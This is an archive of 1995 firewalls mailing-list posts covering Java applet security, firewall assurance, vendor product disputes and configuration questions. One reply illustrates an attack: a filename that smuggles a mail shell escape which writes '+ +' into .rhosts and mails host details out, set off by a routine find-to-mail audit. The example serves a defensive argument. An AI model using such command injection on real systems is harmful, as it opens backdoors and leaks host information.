On the contrary it is exactly the word to use. Most security experts will choose to take the hypothesis "It is possible to write a virus in Java" and then try to prove it. I for one am interested in all such attempts to prove this and will help with any information I can provide. Were it actually possible we'd be stupid not to change Java instantly to prevent it. >Please provide a pointer to information that details how it is >'impossible to express a virus'. There is the Java language spec that is online at http://java.sun.com and soon there will be a YACC grammar for folks to play with. Let me sketch it out for you and that at least may help guide your investigations. The Java language is *strongly* typed, unlike C or C++. It has *no* type loopholes unlike PASCAL, Modula-2, etc. The ability to create a pointer is a closely held capability. Only the runtime can create pointers (references in Java) and when created pointers are indelibly marked with their type. All casts are checked for typing violations. The closest thing Java has to anonymous memory is arrays, however arrays are arrays of refs or scalars, and in all cases types are checked and index bounds are checked when dealing with arrays. Arithmetic on pointers (references) is not possible. (No byte code support for it, no compiler support for it) So you might say "Well Gee, so what CAN you write in Java?" Java provides a single (pretty big actually) loop hole called "native" methods. A native method is one that is implemented in a non-Java language (typically C or C++). Native methods are capable of type unsafe operations, peering into the private underparts of objects, stomping memory, what have you. So called "Dangerous" capabilities are encapsulated in object classes whose methods are implemented in C. (This includes things like class Object, and class Class for example). Native methods are _never_ allowed in imported (and untrusted) code. To be a native method the class file must set the Native attribute for the method, if the native attribute is set the class is rejected, if the class has no native methods initally, it cannot add one later. Nor can it load its own classes. So in the literal sense, a virus must find away of propagating itself to the target system. And that would require it to be able to "write itself" somehow. It can't get access to the native system directly, and we won't let it have access through our classes (like FileOutputStream). Anyway, so to some extent *Java* is not a general purpose language, however the Java *system* is a general purpose application development environment. This level of separation gives exceptional security controls to the system. Anyway, think about it some more, read the language spec (there is an even better one in the works but it probably won't be out for a couple of months), let me know if I can clarify anything you've read, and then let me know where you see problems (if any) --Chuck From firewalls-owner Fri Sep 15 15:48:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29065 for firewalls-outgoing; Fri, 15 Sep 1995 14:39:04 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA29050 for ; Fri, 15 Sep 1995 14:38:55 -0700 Date: Fri, 15 Sep 95 17:35 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: firewall certification authority To: firewalls@GREATCIRCLE.COM Message-ID: <950915213527.024437@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ranum writes: >> Design-oriented testing . . . [starts] with the >> question: "Why do you think this firewall >> protects . . . itself effectively?" It would be more appropriate to ask, "Why do you think the platform atop which the firewall executes protects the firewall effectively." Since the firewall obviously depends upon the mechanisms and assurances provided by the underlying O/S to implement its own mechanisms, a firewall that protects itself well but that sits atop a shaky, low-assurance platform is essentially a house of cards. If component C1 of the firewall attempts to perform some verification upon component C2 and must rely upon operating system mechanism M to do it we are in deep trouble if the means by which M is invoked, or the sanctity of M itself, is compromised. I think vendors know this, but it's obviously easier to quickly slap together a firewall and sell it than to take pains to integrate firewall software atop a trusted O/S base. >> I've heard scary stories of people doing "firewall testing" >> who do not understand UNIX. So, for example, they will tell >> you the firewall is insecure if the sendmail executable has >> not been deleted. Maybe they understand UNIX better than you think. Hearkening to the battle cry of "least privilege," it is clear that executables should not be left on the system if these executables could invite trouble should someone succeed in launching them. The fact that "no one can get to them" because the firewall is in place is irrelevant: observe that we customarily strip down "gateway boxes," deleting compilers and linkers and so forth, even though no unprivileged user logins are allowed on the system and these tools "can't be executed" anyway. From firewalls-owner Fri Sep 15 16:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02621 for firewalls-outgoing; Fri, 15 Sep 1995 15:34:10 -0700 Received: from puddytat.intecom.com (puddytat.intecom.com [192.246.135.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02610 for ; Fri, 15 Sep 1995 15:34:05 -0700 Received: (from mbrennen@localhost) by puddytat.intecom.com (8.6.12/8.6.12) id RAA12953; Fri, 15 Sep 1995 17:30:52 -0500 Date: Fri, 15 Sep 1995 17:30:52 -0500 (CDT) From: Michael Brennen To: Shawn Steele cc: Firewalls@GreatCircle.COM Subject: Re: Any known security holes in the "vacation" program In-Reply-To: <9509151323.ZM4018@aob.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 15 Sep 1995, Shawn Steele wrote: > If all you are looking for is an auto-responder, it usually isn't very > difficult to create a small program to scan for From: & Reply-To: O'Reilly's MIIS describes a general purpose one called "canned_reply". From firewalls-owner Fri Sep 15 16:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02710 for firewalls-outgoing; Fri, 15 Sep 1995 15:35:46 -0700 Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA02702 for ; Fri, 15 Sep 1995 15:35:41 -0700 Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/3.1.090690-Ovid Technologies) id AA13067; Fri, 15 Sep 1995 16:31:39 -0600 Date: Fri, 15 Sep 1995 16:31:39 -0600 (MDT) From: Adam Prato To: mramirez@imparcial.com.mx Cc: firewalls@greatcircle.com Subject: Re: Help with CISCO 2511 In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote: > I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 F= AX) . > I=B4m having problems trying to configure the receiving modems to support > 14,400 bps from the callers. > Actually my users only can connect to the modems at 9600 bps, and the > technical support from CISCO told me that I have to change my modems to > 28,800 bps, that=B4s the only way that my receiving modems can receive ca= lls > at 14,400 bps. > It=B4s true?? , because I think that is some problem with the configurat= ion > of the CISCO (in dedicated or interactive mode) >=20 > Thanks.. I dont think so. But try this 1) Make sure all dipswitch settings are correct for the modems 2) logon to routers console (not telnet) and enable privileged mode 3) config term 4) line 1 10 5) modem in out 6) ctrl-c (exit config-line) 7) telnet to the router at port 20xx - where the XX refers to the line of t= he modem, from 01 to 10. 8) issue the necessary AT commands to communicate with the modem. Configure the modem to autoanswer (ATS0=3D1) and any other modem settings (&c1&d3 = so on soforth) 9) exit by pressing escape sequence. default on cisco is ctrl-shft-6-x =20 10) clear line XX where XX is the line you just configured thats it. logoff the router (ignore any errors about open connections) and dial in. Adam From firewalls-owner Fri Sep 15 16:12:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29948 for firewalls-outgoing; Fri, 15 Sep 1995 14:51:24 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29926 for ; Fri, 15 Sep 1995 14:51:13 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA10466 for ; Fri, 15 Sep 1995 16:53:47 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 181050000; 15 Sep 95 17:50 CDT Received: from sctc.com by sccmailhost.sctc.com id 187940000; 15 Sep 95 17:50 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA25904; Fri, 15 Sep 1995 16:49:51 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA10307; Fri, 15 Sep 1995 16:49:51 -0500 Date: Fri, 15 Sep 1995 16:49:51 -0500 From: Rick Smith Message-Id: <199509152149.QAA10307@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby writes: >The implication in the above statement is that the Mail Guard >functions as a firewall. Not True. The SNS Mail Guard does >*not* function as a firewall. > [further unhappy comments omitted] Frank, I don't know what kind of secure connectivity problem you are trying to solve. In practice *I* don't talk about the Guard as a "firewall" since it's not excessively useful as an "Internet firewall." But in terms of the basic definition, it passes in flying colors. Permit me to steal from Cheswick & Bellovin: * all traffic between inside and outside pass through it * only authorized traffic is passed, based on a security policy * the device is immune to penetration Well, as much as anything can be "immune." The Guard takes 3 out of 3. > I was told by a salesman who represented >the Sidewinder that it was blessed by the gov't powers-that-be as >*the* gov't sanctioned firewall. Hogwash. Are we speaking of the Mail Guard or Sidewinder? These are *completely* separate products. I don't know of any special government endorsement of Sidewinder, either. It *is* true, however, that the Mail Guard is endorsed for moving e-mail between classified and unclassified networks, and is probably the only device so endorsed. > I will vehemently >oppose any claims that the Mail Guard is a firewall - Internet or >otherwise. I am willing to believe you have an application that requires security mechanisms you've seen in some firewall products, and that the Mail Guard doesn't have the mechanisms you need. However, that doesn't mean Mail Guards (or other types of multilevel guards) are not some class of firewall by definition. But the word "guard" is better to use. > It isn't necessary to mis-represent a product in order >for it to sell - particularly in the (justified) paranoia of CEO's >& CIO's who break into a cold sweat at the thought of doing business >on the Internet. I fully agree, and so do the sales folks that I work with here. Bogus statements are counterproductive in the security business. Most customers need technical buy-in before the sale takes place, so any misrepresentation is probably going to be caught. Then the sales effort becomes a waste of time for the sales folks as well as angering a potential customer. NOBODY benefits from this. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 16:15:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26407 for firewalls-outgoing; Fri, 15 Sep 1995 14:03:13 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA26379 for ; Fri, 15 Sep 1995 14:03:02 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA10188 for ; Fri, 15 Sep 1995 16:05:16 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 175600000; 15 Sep 95 17:01 CDT Received: from sctc.com by sccmailhost.sctc.com id 184670000; 15 Sep 95 17:01 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA24477; Fri, 15 Sep 1995 16:00:59 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA07051; Fri, 15 Sep 1995 16:00:58 -0500 Date: Fri, 15 Sep 1995 16:00:58 -0500 From: Rick Smith Message-Id: <199509152100.QAA07051@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby writes: >If I remember right, the Orange Book does *not* permit classified and >unclassified users on the same system - even if the system has been >certified as A1. Probably for good reason. A nit: the Orange Book is silent on this. It's an issue of DOD policy and site specific accreditation decisions. Some "interim" decisions implemented in practice would probably curl your hair. >In my experience in the information security field, there is no such >thing as a "nonbypassible access control mechanism" of an O/S. Anything >can be compromised. It is a simple matter of how much time, manpower, >resources, and/or money you are willing to spend to accomplish your >objective. I use the term "nonbypassable access control" in the Orange Book sense of a reference monitor mechanism that is applied to all access control decisions and that can not be disabled by the user. I use it to distinguish Type Enforcement protections from conventional Unix style protections. Unix protections can be overridden by a sufficiently powerful system user while T.E. protections can not. In the pure sense T.E. is no more "nonbypassable" than any other computer based mechanism, like the Kernel/User mode access control mechanisms present in most processor architectures. >If the target is a host, there is a significant penetration problem when >dealing with sendmail. However, if the target is an application gateway >(firewall), then the penetration attack is handled at the application >layer & (if done right - which most reputable firewall vendors do) the >attack never gets to the O/S. The point is, even the most perfect vendor in the world is not going to block a mail server hole that hasn't already been found and fixed. What if this attacker found it first? The O/S level protection (Type Enforcement) is there to handle that very real threat. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 17:15:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA07997 for firewalls-outgoing; Fri, 15 Sep 1995 16:46:13 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA07976 for ; Fri, 15 Sep 1995 16:46:07 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id SAA11373 for ; Fri, 15 Sep 1995 18:48:42 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 193530000; 15 Sep 95 19:45 CDT Received: from sctc.com by sccmailhost.sctc.com id 195730000; 15 Sep 95 19:44 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id SAA28040; Fri, 15 Sep 1995 18:44:19 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id SAA14646; Fri, 15 Sep 1995 18:44:18 -0500 From: Rick Smith Message-Id: <199509152344.SAA14646@shade.sctc.com> Subject: Re: Secure version of Sendmail To: firewalls@greatcircle.com Date: Fri, 15 Sep 1995 18:44:18 -0500 (CDT) Cc: Rick Smith X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2696 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby presents his bones of contention: >1) The Sidewinder was claimed to firewall a number of government agencies > as part of an approved configuration. I know that Sidewinder is in use at several government agencies. So is the Mail Guard. There is at least one site whose network incorporates both SNSes and Sidewinders. > What was represented to me was that the > Sidewinder was acting as a firewall in the approved configuration. In other words, some sales person tried to impress you with technical data that turned out to be wrong. As I said before, the sales people I've worked with here try hard to get their facts straight. The SNS and Sidewinder configuration in question has been demo'ed at trade shows. I can see how a sales person could get the details turned around. Sales people _always_ interpret things in the best possible light for the product. It's how they work, and the sort of mistake they're likely to make, even as they try to be accurate. In any case, a decision to buy Sidewinder *can* and *should* be based on a solid technical evaluation of security issues and not on alluring imagery, like its use to Keep Bits Safe For Democracy, or even Stopping Hackers at Defcon. >2) The Sidewinder was supposed to have the capability of reading mails when > delivered and blocking mails which may have a sensitive content - based > on a keyword search. > It still doesn't. An acquaintance of mine from another company talked > to the engineering staff at Secure Computing. According to them, the > mail-reading capability won't be delivered. Ever. Content based filtering for e-mail will be released this fall. >3) The Sidewinder was supposed to be able to filter/restrict applications & >protocols to inbound, outbound, both, or none. > When it was delivered, it only had *all* or *nothing*. If ftp or > telnet were turned on, *bidirectional* access was turned on. 8^( > A serious security problem in my humble opinion. Granted this problem > was taken care of in the last release, but it should never have happened Sidewinder 2.0 filters/restricts application protocols to inbound, outbound, both, or none. The earlier Sidewinder release restricted protocols by just not providing them. It supported e-mail, DNS, and an external, protected Web server. It didn't provide proxy services for FTP or Telnet. I'm really sorry about any misunderstandings. As I stated before, it just wastes time for people to mislead each other. Even are sales folks believe that. We want to get it right and we're trying to get it right. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 17:17:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA06359 for firewalls-outgoing; Fri, 15 Sep 1995 16:25:06 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA06347 for ; Fri, 15 Sep 1995 16:25:01 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA02561 for ; Fri, 15 Sep 1995 18:23:47 -0500 Received: from MACCVM.CORP.MOT.COM (maccvm.corp.mot.com [129.188.244.1]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id SAA16248 for ; Fri, 15 Sep 1995 18:23:46 -0500 Received: from MACCVM by MACCVM.CORP.MOT.COM (IBM VM SMTP V2R3) with BSMTP id 9256; Fri, 15 Sep 95 16:23:44 MST Date: 15 Sep 1995 16:23:43 -0700 Message-ID: <"XOPR85 95/09/15 23:23:43.920960"@MACCVM.CORP.MOT.COM> From: Jacob Hinther To: Firewalls Subject: Secure Web Proxy Server Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings: Can anyone recommend a commercial web proxy server with security that is significantly better than that provided by Netscape? I know this is not a Firewall question but I consider you to be THE security experts and I have respect for your opinion. Thanks, Jake From firewalls-owner Fri Sep 15 20:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA15518 for firewalls-outgoing; Fri, 15 Sep 1995 19:46:39 -0700 Received: from voga.rmit.EDU.AU (voga.rmit.EDU.AU [131.170.1.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA15511 for ; Fri, 15 Sep 1995 19:46:32 -0700 From: S9204286@pitvax.xx.rmit.edu.au Received: from pitvax.xx.rmit.EDU.AU by voga.rmit.EDU.AU with SMTP id AA16234 (5.65c/IDA-1.5/qva1-oz for ); Sat, 16 Sep 1995 12:45:18 +1000 Received: from pitvax.xx.rmit.edu.au by pitvax.xx.rmit.edu.au (PMDF V4.3-7 #2554) id <01HVCEDS9EJ48WZPNV@pitvax.xx.rmit.edu.au>; Sat, 16 Sep 1995 12:48:00 +1000 Date: Sat, 16 Sep 1995 12:48:00 +1000 Subject: Looking for firewall info To: Firewalls@GreatCircle.COM Message-Id: <01HVCEDSB0EQ8WZPNV@pitvax.xx.rmit.edu.au> X-Envelope-To: Firewalls@GreatCircle.COM X-Vms-To: IN%"Firewalls@GreatCircle.COM" Mime-Version: 1.0 Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Date sent: 16-SEP-1995 12:37:08 Hi, I was wondering if anyone here would be able to help me. I am a 3rd year computer science student in Australia and am doing a research project on firwalls in relation to network security ie what they are, how they work, types, implementation and so on. I have been lurking in this mailing list for a while now and it is mostly techie discussion and not really what I need. If anyone can point me in the right direction I would very much appreciate it. Thank you. =======Ian McNab s9204286@pitvax.xx.rmit.edu.au============= "Suddenly I knew that you'd have to go, Your world was not mine, your eyes told me so, Yet it was there I felt the crossroads of time And I wondered why." - L.M. ============================================================ From firewalls-owner Fri Sep 15 22:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA18547 for firewalls-outgoing; Fri, 15 Sep 1995 22:27:55 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA18540 for ; Fri, 15 Sep 1995 22:27:47 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa08097; 16 Sep 95 0:46 +0100 Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa08146; 16 Sep 95 0:43 +0100 Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id TAA03849; Fri, 15 Sep 1995 19:48:57 +0100 From: Karl Strickland Message-Id: <199509151848.TAA03849@bagpuss.demon.co.uk> Subject: Re: wank worm To: Mark MMDF-Warning: Unable to confirm address in preceding line at disperse.demon.co.uk Date: Fri, 15 Sep 1995 19:48:57 +0100 (BST) Cc: frankw@in.net, proff@suburbia.net, firewalls@greatcircle.com MMDF-Warning: Unable to confirm address in preceding line at disperse.demon.co.uk In-Reply-To: <199509150448.AA41538@junkers.lochard.com.au> from "Mark" at Sep 15, 95 03:48:07 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 508 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >I doubt you want this particular fortune file for your program as the > >messages generated by the fortune cookie in the wank worm were obscene > >& vulgar. > Smart, can you please post a copy to the list. Cheers -- ------------------------------------------+----------------------------------- Mailed using ELM on FreeBSD | Karl Strickland PGP 2.3a Public Key Available. | Internet: karl@bagpuss.demon.co.uk | From firewalls-owner Sat Sep 16 01:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA20428 for firewalls-outgoing; Sat, 16 Sep 1995 00:39:04 -0700 Received: from Csli.Stanford.EDU (Csli.Stanford.EDU [36.9.0.46]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA20421 for ; Sat, 16 Sep 1995 00:39:00 -0700 Received: from Csli.Stanford.EDU (localhost.Stanford.EDU [127.0.0.1]) by Csli.Stanford.EDU (8.6.11/8.6.11) with ESMTP id AAA24133; Sat, 16 Sep 1995 00:37:30 -0700 Message-Id: <199509160737.AAA24133@Csli.Stanford.EDU> To: kahar@sebank.se cc: firewalls@GreatCircle.COM Subject: Re: IBM NetSP In-reply-to: Your message of Fri, 15 Sep 1995 09:51:59 CDT. <199509151452.JAA11534@psisa.com> Date: Sat, 16 Sep 1995 00:37:28 -0700 From: Christian Wettergren Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm looking for comments and experiences with IBMs NetSP, Secured Network > Gateway version 1.2. How does it compare to other products like BorderWare > and FireWall-1? Hi Katarina! (Hej Katarina! :-)) I'm a customer at SE-Banken, and I hope you know what your doing. :-) I'll jump to conclusions for a while below, and will most certainly exagerate what you might actually be planning. Hope it is ok with you, perhaps being rather safe than sorry? I don't like my bank being connected to the net. And no matter what the sales reps says, or anyone else here for that matter either, I don't think that any of the current products are good enough to be able to compensate for the kind of attacks that would be possible given the payoff of attacking a bank. I mean, most of the data you are carrying can be converted into hard cash in a matter of days, in innumerous ways. Leaking of strategic information, privacy invasions of people, account numbers, stock information, secret passwords used internally and then reused are more critical sites etc. I would also say that you could not have an ordinary firewall in your organisation. You could not allow employees to connect out, via for example Netscape/WWW, since it would be far too easy to trick them into downloading malicious data. There are simply too many weaknesses in the viewers of today, I would state. I actually can't see any safe use of Internet access for almost any of your employees, not right now at least (being in shock, seeing scenarios of my money being swept away by the infamous Swedish Hacker Association, :-( ) Do you care to tell me what you plans with your Internet access are? As I am a customer of yours? Either in private through email, or publically here? You probably end up with an interesting and enlightning discussion if you did it publically. :-) Also note that there is a parallel thread of discussion going on right now, that was started by one of the more well-known experts on this list, Marcus J Ranum. His trigging letter said basically, "when will people see that we don't have any clothes?", ie. there is today no security that can counter an attack by someone with sufficient resources. I believe banks will be in a new class of Internet sites, that will have much more powerful attackers. And don't even consider starting any serious home banking for a couple of years. Things has to shake down a bit first. Rumor has it the phone banks have had some problems - you'll be even worse off here! Ok, that's it for paranoia and panic right now. Back to normal pitch of voice. :-) I can tell you I have applied for money for a swedish Computer Emergency Response Team. Others have too, so there will most likely emerge such a beast in Sweden within a year. I'm sure we could do some very useful preventive discussions, and share some of the experiences of Internet security with you. One good trick to get an estimate of how good a firewall actually is, is to try to get an insurance company to issue an insurance against losses caused by its failed operation. The limit of the insurance will show you to what extent you can trust the firewall. (And if the limit is too high, you just gained by this excerise.) Don't hesitate to contact me directly, in any of the following ways: Christian Wettergren KTH/Teleinformatics cwe@it.kth.se phone: 08 - 752 14 91 fax: 08 - 751 17 93 (guest at Stanford another week, you can reach me at cwe@csli.stanford.edu, phone: +1 415 328 08 48, 9 hour time diff.) Regards, and sorry for the ranting, Christian Wettergren From firewalls-owner Sat Sep 16 02:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA22438 for firewalls-outgoing; Sat, 16 Sep 1995 01:38:54 -0700 Received: from Csli.Stanford.EDU (Csli.Stanford.EDU [36.9.0.46]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA22423 for ; Sat, 16 Sep 1995 01:38:46 -0700 Received: from Csli.Stanford.EDU (localhost.Stanford.EDU [127.0.0.1]) by Csli.Stanford.EDU (8.6.11/8.6.11) with ESMTP id BAA27134; Sat, 16 Sep 1995 01:37:15 -0700 Message-Id: <199509160837.BAA27134@Csli.Stanford.EDU> To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis) cc: firewalls@GreatCircle.COM, kjj@pondscum.phx.mcd.mot.com Subject: Re: I wish Java would go away ... In-reply-to: Your message of Fri, 15 Sep 1995 15:24:15 PDT. <9509152224.AA20137@pepper.Eng.Sun.COM> Date: Sat, 16 Sep 1995 01:37:14 -0700 From: Christian Wettergren Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | >'impossible' is such an interesting word to fling around security | >folks... | | On the contrary it is exactly the word to use. Most security experts | will choose to take the hypothesis "It is possible to write a virus | in Java" and then try to prove it. I for one am interested in all such | attempts to prove this and will help with any information I can provide. | Were it actually possible we'd be stupid not to change Java instantly | to prevent it. But aren't you assuming people will follow the rules you've set up for this game? You say things like "in Java", and "impossible". * It is not impossible given stupid users that disable your restrictive defaults, setting READPATH==WRITEPATH==everywhere? You leave a heavy burden on the security officer, since Java is so extensibly configurable. This might be the thing that tips the balance, so to say. * you say "within JAVA", assuming somehow that _only Java will be used_ for a virus? there are plenty of other bits and pieces out there that together with Java might make up a virus. The problem of virii has changed somewhat, as is shown by the Word 6 virus. You are reasoning about virii on *one* level, the byte code level. But what about higher-level virii? * The messiness of it all. Java opens up a lot of unexpected information and modification pathways. These new changes might change the security analysis of *another* program in a significant way, that *together* might become a major security problem. 1/ java applet downloaded, does something neat, and also at the same time deposits a file in the allowed file space, containing malicious data. Lets say that it's filename is 'look \n ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org' (that was the filename.) it also makes the file setuid/setgid or something like that. Something that will make most logging systems notice. 2/ during the night the security audit starts, and walks through the file tree with something like this; find /home -perm 4000 -print | mail staff@$50.com This will generate perfectly legitimate input to the mail program. illegal file(s) found! Files: look ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org mail understands the ~! to be a shell escape, that is executed. The intruder will have a couple of hours before the admin reads this mail. (A lot of sites do run this kind of reporting scheme, with a find piping into a mail.) I would argue there are uncountable numbers of similar attacks. And yes, you can probably introduce some kind of virus through this scheme, if you want to. Your concentration on virii is because you believe this is/was the main threat with Java. I don't think that is the main threat. I instead believe that Java might "complete some chains of small deficiencies", and it is general enough to do this in non-obvious ways. And you reason about Java as a stand-alone thing. It is not, it is part of a complex ecology of tools, scripts, configurations and practices. Why do you assume an attacker will "play by the rules"? | The Java language is *strongly* typed, unlike C or C++. It has *no* | type loopholes unlike PASCAL, Modula-2, etc. The ability to create a | pointer is a closely held capability. Only the runtime can create | pointers (references in Java) and when created pointers are indelibly | marked with their type. All casts are checked for typing violations. I believe Java, and the Java team of course, is doing an excellent job. And immediately does the next security monster rear it's ugly head. Not fair! :-) /Christian From firewalls-owner Sat Sep 16 11:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29921 for firewalls-outgoing; Sat, 16 Sep 1995 11:11:35 -0700 Received: from beast.brainlink.com (beast.brainlink.com [199.184.242.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA29914 for ; Sat, 16 Sep 1995 11:11:30 -0700 Received: by beast.brainlink.com (4.1/20Jul95-BrainLINK International) id AA17083; Sat, 16 Sep 95 14:11:50 edt Date: Sat, 16 Sep 1995 14:11:50 -0400 (edt) From: root To: long-morrow@cs.yale.edu Cc: cosborn@bbn.com, jst10@octacon.co.uk, firewalls@greatcircle.com Subject: Re: WWW - http - cgi_scripts In-Reply-To: <199509151400.KAA20314@SPARKY.CF.CS.YALE.EDU> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 15 Sep 1995 long-morrow@CS.YALE.EDU wrote: > It can be a pain (you have to make sure that anything that CGI programs needs -- > shared libraries, perl interpreter and library modules -- exists within the > chroot()d hierarchy, but it should help to contain a CGI program gone haywire > (or one that an external WWW user attempted to trick and hijack). > > We run a number of CGI programs in a chroot()d environment. > > - Morrow Would you mind sharing what you needed to move to the chrooted environment to make CGI work?? ========= << raj >> == http://www.brainlink.com/~frostbit/ ============== frostbit@brainlink.com SYADMIN: BrainLINK System (718) 805-8868 // http://www.brainlink.com GCS d++ H-- s+:+ !g p2 !au a- w+ v-* C++++ US++++ L++ P+++ E- N+ W--- M-- po Y+ t-- 5+++ j++ tv b+++ e++ u+ h++ f+ r++ n+ y+ ============================================================================ From firewalls-owner Sat Sep 16 11:36:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00150 for firewalls-outgoing; Sat, 16 Sep 1995 11:26:15 -0700 Received: from utrecht.knoware.nl (utrecht.knoware.nl [193.78.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA00143 for ; Sat, 16 Sep 1995 11:26:05 -0700 Received: from csehost.knoware.nl (csehost.knoware.nl [193.78.123.240]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id UAA08017; Sat, 16 Sep 1995 20:23:56 +0200 Date: Sat, 16 Sep 1995 20:23:56 +0200 Message-Id: <199509161823.UAA08017@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Sam Howard From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: External Client Access Policy Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sam Howard wrote: >Does anyone have any "policy" statements that they'd be willing to share? > We are looking to have people at our clients sign a "Network Access >Agreement" stating things like: thou shalt not do bad things, etc, etc, but >the verbiage on that is not anywhere near complete, so I thought I'd ask >around for hints...anyone? I recommend you acquire Charles Cresson Wood's 